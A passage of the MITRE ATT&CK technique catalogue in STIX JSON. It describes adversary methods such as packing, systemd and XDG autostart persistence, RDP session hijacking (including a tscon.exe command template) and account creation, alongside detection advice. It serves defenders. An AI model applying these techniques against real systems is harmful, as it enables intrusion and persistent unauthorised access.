Robert Falcone. (2016, September 26). Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.", "url": "https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/"}, {"source_name": "Methods of Mac Malware Persistence", "description": "Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.", "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf"}, {"source_name": "OSX Malware Detection", "description": "Patrick Wardle. (2016, February 29). Let's Play Doctor: Practical OS X Malware Detection & Analysis. Retrieved July 10, 2017.", "url": "https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf"}, {"source_name": "OceanLotus for OS X", "description": "Eddie Lee. (2016, February 17). OceanLotus for OS X - an Application Bundle Pretending to be an Adobe Flash Update. Retrieved July 5, 2017.", "url": "https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2023-03-30T21:01:48.113Z", "name": "Software Packing", "description": "Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018) \n\nUtilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.(Citation: Awesome Executable Packing) ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Filip Kafka, ESET"], "x_mitre_deprecated": false, "x_mitre_detection": "Use file scanning to look for known software packers or artifacts of packing techniques. Packing is not a definitive indicator of malicious activity, because legitimate software may use packing techniques to reduce binary size or to protect proprietary code.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS", "Windows", "Linux"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Anti-virus", "Heuristic detection", "Signature-based detection"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--deb98323-e13f-4b0c-8d94-175379069062", "created": "2020-02-05T14:17:46.686Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1027/002", "external_id": "T1027.002"}, {"source_name": "Awesome Executable Packing", "description": "Alexandre D'Hondt. (n.d.). Awesome Executable Packing. Retrieved March 11, 2022.", "url": "https://github.com/dhondta/awesome-executable-packing"}, {"source_name": "ESET FinFisher Jan 2018", "description": "Kafka, F. (2018, January). ESET's Guide to Deobfuscating and Devirtualizing FinFisher. Retrieved August 12, 2019.", "url": "https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-10-20T21:19:57.555Z", "name": "Serverless", "description": "Adversaries may compromise serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them. \n\nOnce compromised, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "resource-development"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Awake Security"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--df1bc34d-1634-4c93-b89e-8120994fce77", "created": "2022-07-08T12:46:15.450Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1584/007", "external_id": "T1584.007"}, {"source_name": "AWS Lambda Redirector", "description": "Adam Chester. (2020, February 25). AWS Lambda Redirector. Retrieved July 8, 2022.", "url": "https://blog.xpnsec.com/aws-lambda-redirector/"}, {"source_name": "Detecting Command & Control in the Cloud", "description": "Gary Golomb. (n.d.). Threat Hunting Series: Detecting Command & Control in the Cloud. Retrieved July 8, 2022.", "url": "https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/"}, {"source_name": "BlackWater Malware Cloudflare Workers", "description": "Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.", "url": "https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-04-16T12:28:21.234Z", "name": "Web Protocols", "description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as HTTP/S(Citation: CrowdStrike Putter Panda) and WebSocket(Citation: Brazking-Websockets) that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["TruKno"], "x_mitre_deprecated": false, "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)\n\nMonitor for web traffic to/from known-bad or suspicious domains. ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Network"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", "created": "2020-03-15T16:13:46.151Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1071/001", "external_id": "T1071.001"}, {"source_name": "CrowdStrike Putter Panda", "description": "Crowdstrike Global Intelligence Team. (2014, June 9). CrowdStrike Intelligence Report: Putter Panda. Retrieved January 22, 2016.", "url": "http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf"}, {"source_name": "University of Birmingham C2", "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"}, {"source_name": "Brazking-Websockets", "description": "Shahar Tavor. (n.d.). BrazKing Android Malware Upgraded and Targeting Brazilian Banks. Retrieved March 24, 2023.", "url": "https://securityintelligence.com/posts/brazking-android-malware-upgraded-targeting-brazilian-banks/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Visual Basic", "description": "Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)\n\nDerivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript)\n\nAdversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads (which may also involve [Mark-of-the-Web Bypass](https://attack.mitre.org/techniques/T1553/005) to enable execution).(Citation: Default VBS macros Blocking )", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Monitor for events associated with VB execution, such as Office applications spawning processes, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving VB payloads or scripts, or loading of modules associated with VB languages (ex: vbscript.dll). VB execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programable post-compromise behaviors and could be used as indicators of detection leading back to the source.\n\nUnderstanding standard usage patterns is important to avoid a high number of false positives. If VB execution is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If VB execution is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Payloads and scripts should be captured from the file system when possible to determine their actions and intent.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "macOS", "Linux"], "x_mitre_version": "1.4", "x_mitre_data_sources": [], "x_mitre_remote_support": false, "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", "created": "2020-03-09T14:29:51.508Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1059/005", "external_id": "T1059.005"}, {"source_name": "VB .NET Mar 2020", "description": ".NET Team. (2020, March 11). Visual Basic support planned for .NET 5.0. Retrieved June 23, 2020.", "url": "https://devblogs.microsoft.com/vbteam/visual-basic-support-planned-for-net-5-0/"}, {"source_name": "Default VBS macros Blocking ", "description": "Kellie Eickmeyer. (2022, February 7). Helping users stay safe: Blocking internet macros by default in Office. Retrieved February 7, 2022.", "url": "https://techcommunity.microsoft.com/t5/microsoft-365-blog/helping-users-stay-safe-blocking-internet-macros-by-default-in/ba-p/3071805"}, {"source_name": "Microsoft VBScript", "description": "Microsoft. (2011, April 19). What Is VBScript?. Retrieved March 28, 2020.", "url": "https://docs.microsoft.com/previous-versions//1kw29xwf(v=vs.85)"}, {"source_name": "Microsoft VBA", "description": "Microsoft. (2019, June 11). Office VBA Reference. Retrieved June 23, 2020.", "url": "https://docs.microsoft.com/office/vba/api/overview/"}, {"source_name": "VB Microsoft", "description": "Microsoft. (n.d.). Visual Basic documentation. Retrieved June 23, 2020.", "url": "https://docs.microsoft.com/dotnet/visual-basic/"}, {"source_name": "Wikipedia VBA", "description": "Wikipedia. (n.d.). Visual Basic for Applications. Retrieved August 13, 2020.", "url": "https://en.wikipedia.org/wiki/Visual_Basic_for_Applications"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2021-04-29T14:49:39.188Z", "name": "Hidden File System", "description": "Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)\n\nAdversaries may use their own abstracted file system, separate from the standard file system present on the infected system. In doing so, adversaries can hide the presence of malicious components and file input/output from security tools. Hidden file systems, sometimes referred to as virtual file systems, can be implemented in numerous ways. One implementation would be to store a file system in reserved disk space unused by disk structures or standard file system partitions.(Citation: MalwareTech VFS Nov 2014)(Citation: FireEye Bootkits) Another implementation could be for an adversary to drop their own portable partition image as a file on top of the standard file system.(Citation: ESET ComRAT May 2020) Adversaries may also fragment files across the existing file system structure in non-standard ways.(Citation: Kaspersky Equation QA)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Detecting the use of a hidden file system may be exceptionally difficult depending on the implementation. Emphasis may be placed on detecting related aspects of the adversary lifecycle, such as how malware interacts with the hidden file system or how a hidden file system is loaded. Consider looking for anomalous interactions with the Registry or with a particular file on disk. Likewise, if the hidden file system is loaded on boot from reserved disk space, consider shifting focus to detecting [Bootkit](https://attack.mitre.org/techniques/T1542/003) activity.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User", "Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--dfebc3b7-d19d-450b-81c7-6dafe4184c04", "created": "2020-06-28T22:55:55.719Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1564/005", "external_id": "T1564.005"}, {"source_name": "MalwareTech VFS Nov 2014", "description": "Hutchins, M. (2014, November 28). Virtual File Systems for Beginners. Retrieved June 22, 2020.", "url": "https://www.malwaretech.com/2014/11/virtual-file-systems-for-beginners.html"}, {"source_name": "FireEye Bootkits", "description": "Andonov, D., et al. (2015, December 7). Thriving Beyond The Operating System: Financial Threat Group Targets Volume Boot Record. Retrieved May 13, 2016.", "url": "https://www.fireeye.com/blog/threat-research/2015/12/fin1-targets-boot-record.html"}, {"source_name": "ESET ComRAT May 2020", "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020.", "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf"}, {"source_name": "Kaspersky Equation QA", "description": "Kaspersky Lab's Global Research and Analysis Team. (2015, February). Equation Group: Questions and Answers. Retrieved December 21, 2015.", "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-02-15T14:19:22.282Z", "name": "Systemd Service", "description": "Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014) Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible. \n\nSystemd utilizes unit configuration files with the `.service` file extension to encode information about a service's process. By default, system level unit files are stored in the `/systemd/system` directory of the root owned directories (`/`). User level unit files are stored in the `/systemd/user` directories of the user owned directories (`$HOME`).(Citation: lambert systemd 2022) \n\nInside the `.service` unit files, the following directives are used to execute commands:(Citation: freedesktop systemd.service) \n\n* `ExecStart`, `ExecStartPre`, and `ExecStartPost` directives execute when a service is started manually by `systemctl` or on system start if the service is set to automatically start.\n* `ExecReload` directive executes when a service restarts. \n* `ExecStop`, `ExecStopPre`, and `ExecStopPost` directives execute when a service is stopped. \n\nAdversaries have created new service files, altered the commands a `.service` file\u2019s directive executes, and modified the user directive a `.service` file executes as, which could result in privilege escalation. Adversaries may also place symbolic links in these directories, enabling systemd to find these payloads regardless of where they reside on the filesystem.(Citation: Anomali Rocke March 2019)(Citation: airwalk backdoor unix systems)(Citation: Rapid7 Service Persistence 22JUNE2016) \n\nThe .service file\u2019s User directive can be used to run service as a specific user, which could result in privilege escalation based on specific user/group permissions. ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Tony Lambert, Red Canary", "Emad Al-Mousa, Saudi Aramco", "Tim (Wadhwa-)Brown"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor file creation and modification events of Systemd service unit configuration files in the default directory locations for `root` & `user` level permissions. Suspicious processes or scripts spawned in this manner will have a parent process of \u2018systemd\u2019, a parent process ID of 1, and will usually execute as the `root` user.(Citation: lambert systemd 2022) \n\nSuspicious systemd services can also be identified by comparing results against a trusted system baseline. Malicious systemd services may be detected by using the systemctl utility to examine system wide services: `systemctl list-units -\u2013type=service \u2013all`. Analyze the contents of `.service` files present on the file system and ensure that they refer to legitimate, expected executables, and symbolic links.(Citation: Berba hunting linux systemd)\n\nAuditing the execution and command-line arguments of the `systemctl` utility, as well related utilities such as `/usr/sbin/service` may reveal malicious systemd service execution.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux"], "x_mitre_version": "1.5", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User", "root"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--dfefe2ed-4389-4318-8762-f0272b350a1b", "created": "2020-01-17T16:15:19.870Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1543/002", "external_id": "T1543.002"}, {"source_name": "airwalk backdoor unix systems", "description": "airwalk. (2023, January 1). A guide to backdooring Unix systems. Retrieved May 31, 2023.", "url": "http://www.ouah.org/backdoors.html"}, {"source_name": "Anomali Rocke March 2019", "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019.", "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang"}, {"source_name": "freedesktop systemd.service", "description": "Free Desktop. (n.d.). systemd.service \u2014 Service unit configuration. Retrieved March 20, 2023.", "url": "https://www.freedesktop.org/software/systemd/man/systemd.service.html"}, {"source_name": "Linux man-pages: systemd January 2014", "description": "Linux man-pages. (2014, January). systemd(1) - Linux manual page. Retrieved April 23, 2019.", "url": "http://man7.org/linux/man-pages/man1/systemd.1.html"}, {"source_name": "Berba hunting linux systemd", "description": "Pepe Berba. (2022, January 30). Hunting for Persistence in Linux (Part 3): Systemd, Timers, and Cron. Retrieved March 20, 2023.", "url": "https://pberba.github.io/security/2022/01/30/linux-threat-hunting-for-persistence-systemd-timers-cron/"}, {"source_name": "Rapid7 Service Persistence 22JUNE2016", "description": "Rapid7. (2016, June 22). Service Persistence. Retrieved April 23, 2019.", "url": "https://www.rapid7.com/db/modules/exploit/linux/local/service_persistence"}, {"source_name": "lambert systemd 2022", "description": "Tony Lambert. (2022, November 13). ATT&CK T1501: Understanding systemd service persistence. Retrieved March 20, 2023.", "url": "https://redcanary.com/blog/attck-t1501-understanding-systemd-service-persistence/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-08-14T15:37:02.771Z", "name": "RDP Hijacking", "description": "Adversaries may hijack a legitimate user\u2019s remote desktop session to move laterally within an environment. Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services)\n\nAdversaries may perform RDP session hijacking which involves stealing a legitimate user's remote session. Typically, a user is notified when someone else is trying to steal their session. With System permissions and using Terminal Services Console, `c:\\windows\\system32\\tscon.exe [session number to be stolen]`, an adversary can hijack a session without the need for credentials or prompts to the user.(Citation: RDP Hijacking Korznikov) This can be done remotely or locally and with active or disconnected sessions.(Citation: RDP Hijacking Medium) It can also lead to [Remote System Discovery](https://attack.mitre.org/techniques/T1018) and Privilege Escalation by stealing a Domain Admin or higher privileged account session. All of this can be done by using native Windows commands, but it has also been added as a feature in red teaming tools.(Citation: Kali Redsnarf)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "lateral-movement"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Consider monitoring processes for `tscon.exe` usage and monitor service creation that uses `cmd.exe /k` or `cmd.exe /c` in its arguments to detect RDP session hijacking.\n\nUse of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--e0033c16-a07e-48aa-8204-7c3ca669998c", "created": "2020-02-25T18:35:42.765Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1563/002", "external_id": "T1563.002"}, {"source_name": "RDP Hijacking Medium", "description": "Beaumont, K. (2017, March 19). RDP hijacking\u200a\u2014\u200ahow to hijack RDS and RemoteApp sessions transparently to move through an organisation. Retrieved December 11, 2017.", "url": "https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6"}, {"source_name": "RDP Hijacking Korznikov", "description": "Korznikov, A. (2017, March 17). Passwordless RDP Session Hijacking Feature All Windows versions. Retrieved December 11, 2017.", "url": "http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html"}, {"source_name": "TechNet Remote Desktop Services", "description": "Microsoft. (n.d.). Remote Desktop Services. Retrieved June 1, 2016.", "url": "https://technet.microsoft.com/en-us/windowsserver/ee236407.aspx"}, {"source_name": "Kali Redsnarf", "description": "NCC Group PLC. (2016, November 1). Kali Redsnarf. Retrieved December 11, 2017.", "url": "https://github.com/nccgroup/redsnarf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-01-31T20:46:43.215Z", "name": "Create Account", "description": "Adversaries may create an account to maintain access to victim systems.(Citation: Symantec WastedLocker June 2020) With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.\n\nAccounts may be created on the local system or within a domain or cloud tenant. In cloud environments, adversaries may create accounts that only have access to specific services, which can reduce the chance of detection.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Microsoft Threat Intelligence Center (MSTIC)", "Praetorian", "Austin Clark, @c2defense"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor for processes and command-line parameters associated with account creation, such as net user or useradd. Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system and domain controller. (Citation: Microsoft User Creation Event) Perform regular audits of domain and local system accounts to detect suspicious accounts that may have been created by an adversary.\n\nCollect usage logs from cloud administrator accounts to identify unusual activity in the creation of new accounts and assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Azure AD", "Office 365", "IaaS", "Linux", "macOS", "Google Workspace", "Network", "Containers", "SaaS"], "x_mitre_version": "2.4", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--e01be9c5-e763-4caf-aeb7-000b416aef67", "created": "2017-12-14T16:46:06.044Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1136", "external_id": "T1136"}, {"source_name": "Microsoft User Creation Event", "description": "Lich, B., Miroshnikov, A. (2017, April 5). 4720(S): A user account was created. Retrieved June 30, 2017.", "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720"}, {"source_name": "Symantec WastedLocker June 2020", "description": "Symantec Threat Intelligence. (2020, June 25). WastedLocker: Symantec Identifies Wave of Attacks Against U.S. Organizations. Retrieved May 20, 2021.", "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-16T16:35:12.501Z", "name": "XDG Autostart Entries", "description": "Adversaries may add or modify XDG Autostart Entries to execute malicious programs or commands when a user\u2019s desktop environment is loaded at login. XDG Autostart entries are available for any XDG-compliant Linux system. XDG Autostart entries use Desktop Entry files (`.desktop`) to configure the user\u2019s desktop environment upon user login. These configuration files determine what applications launch upon user login, define associated applications to open specific file types, and define applications used to open removable media.(Citation: Free Desktop Application Autostart Feb 2006)(Citation: Free Desktop Entry Keys)\n\nAdversaries may abuse this feature to establish persistence by adding a path to a malicious binary or command to the `Exec` directive in the `.desktop` configuration file. When the user\u2019s desktop environment is loaded at user login, the `.desktop` files located in the XDG Autostart directories are automatically executed. System-wide Autostart entries are located in the `/etc/xdg/autostart` directory while the user entries are located in the `~/.config/autostart` directory.\n\nAdversaries may combine this technique with [Masquerading](https://attack.mitre.org/techniques/T1036) to blend malicious Autostart entries with legitimate programs.(Citation: Red Canary Netwire Linux 2022)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Tony Lambert, Red Canary"], "x_mitre_deprecated": false, "x_mitre_detection": "Malicious XDG autostart entries may be detected by auditing file creation and modification events within the /etc/xdg/autostart and ~/.config/autostart directories. Depending on individual configurations, defenders may need to query the environment variables $XDG_CONFIG_HOME or $XDG_CONFIG_DIRS to determine the paths of Autostart entries. Autostart entry files not associated with legitimate packages may be considered suspicious. Suspicious entries can also be identified by comparing entries to a trusted system baseline.\n \nSuspicious processes or scripts spawned in this manner will have a parent process of the desktop component implementing the XDG specification and will execute as the logged on user.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User", "root"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--e0232cb0-ded5-4c2e-9dc7-2893142a5c11", "created": "2019-09-10T18:13:12.195Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1547/013", "external_id": "T1547.013"}, {"source_name": "Free Desktop Application Autostart Feb 2006", "description": "Free Desktop. (2006, February 13). Desktop Application Autostart Specification. Retrieved September 12, 2019.", "url": "https://specifications.freedesktop.org/autostart-spec/autostart-spec-latest.html"}, {"source_name": "Free Desktop Entry Keys", "description": "Free Desktop. (2017, December 24). Recognized Desktop Entry Keys. Retrieved September 12, 2019.", "url": "https://specifications.freedesktop.org/desktop-entry-spec/1.2/ar01s06.html"}, {"source_name": "Red Canary Netwire Linux 2022", "description": "TONY LAMBERT. (2022, June 7). Trapping the Netwire RAT on Linux. Retrieved September 28, 2023.", "url": "https://redcanary.com/blog/netwire-remote-access-trojan-on-linux/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-13T17:57:11.924Z", "name": "Standard Application Layer Protocol", "description": "Adversaries may establish command and control capabilities over commonly used application layer protocols such as HTTP(S), OPC, RDP, telnet, DNP3, and modbus. These protocols may be used to disguise adversary actions as benign network traffic. Standard protocols may be seen on their associated port or in some cases over a non-standard port. Adversaries may use these protocols to reach out of the network for command and control, or 